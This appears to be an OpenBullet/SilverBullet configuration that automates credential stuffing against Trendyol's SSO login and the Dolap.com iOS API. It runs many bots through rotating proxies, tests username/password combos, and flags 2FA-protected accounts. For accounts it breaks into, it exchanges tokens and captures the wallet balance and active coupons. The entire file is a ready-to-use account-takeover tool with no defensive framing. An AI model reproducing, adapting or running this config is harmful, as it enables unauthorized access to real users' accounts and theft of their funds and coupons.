[SETTINGS]
{
  "Name": "Dolap.com IOS API",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-06-26T22:56:42.8078007+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Raymond",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 1,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Dolap",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://auth.trendyol.com/sso/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"encodedQuery\":\"eyJhcHBJZCI6IjVjNzJkODQ5LThlMDgtNDA3ZC1iMTdhLTZiYTBiNGFlNzU5YiIsImNhbGxiYWNrVXJsIjoiaHR0cHM6XC9cL2xvZ2luY29tcGxldGlvbi50cmVuZHlvbC5jb20ifQ==\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "message\":\"E-posta adresiniz ve/veya şifreniz hatalı." 
    KEY "message\":\"Beklenmeyen Bir Hata Oluştu." 
    KEY "\"message\":\"Unexpected number" 
  KEYCHAIN Success OR 
    KEY "encodedTokenObj\":\"" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "otpRequired\":true" 

PARSE "<SOURCE>" JSON "encodedTokenObj" -> VAR "encodedTokenObj" 

FUNCTION Base64Decode "<encodedTokenObj>" -> VAR "token" 

PARSE "<token>" LR "{\"token\":\"" "\"}" -> VAR "token" 

REQUEST POST "https://api.dolap.com/member/trendyol" 
  CONTENT "{\"memberCookie\":\"98F3FB7E-C9C2-46B8-8086-FAC9233C8459\",\"idToken\":\"<token>\",\"advertisingId\":\"78F6B4E2-E1E7-4268-BEF5-BBC51F1A10B2\"}" 
  CONTENTTYPE "application/json" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-gb" 
  HEADER "access-token: " 
  HEADER "appplatform: ios" 
  HEADER "appversion: 304" 
  HEADER "categorygroup: WOMAN" 
  HEADER "content-length: 797" 
  HEADER "content-type: application/json" 
  HEADER "user-agent: dolap/16 CFNetwork/1206 Darwin/20.1.0" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "accessToken\":\"" 
  KEYCHAIN Custom "Trendyol Üyesi" OR 
    KEY "signInRequired\":true" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "message\":\"Hesabın kullanıma kapatıldı." 
    KEY "message\":\"Üyeliğin kullanıma kapatıldı." 

PARSE "<SOURCE>" JSON "accessToken" -> VAR "accessToken" 

REQUEST GET "https://api.dolap.com/member/paymentdetail/recent" 
  
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-ie" 
  HEADER "access-token: <accessToken>" 
  HEADER "appplatform: ios" 
  HEADER "appversion: 260" 
  HEADER "categorygroup: WOMAN" 
  HEADER "user-agent: dolap/2 CFNetwork/1206 Darwin/20.1.0" 

PARSE "<SOURCE>" JSON "approvedBalance" CreateEmpty=FALSE -> CAP "Bakiye" "" " TL" 

REQUEST GET "https://api.dolap.com/coupon/dashboard/active?page=0" 
  
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-ie" 
  HEADER "access-token: <accessToken>" 
  HEADER "appplatform: ios" 
  HEADER "appversion: 260" 
  HEADER "categorygroup: WOMAN" 
  HEADER "user-agent: dolap/2 CFNetwork/1206 Darwin/20.1.0" 

PARSE "<SOURCE>" JSON "campaignDescription" Recursive=TRUE CreateEmpty=FALSE -> CAP "Kuponları" 

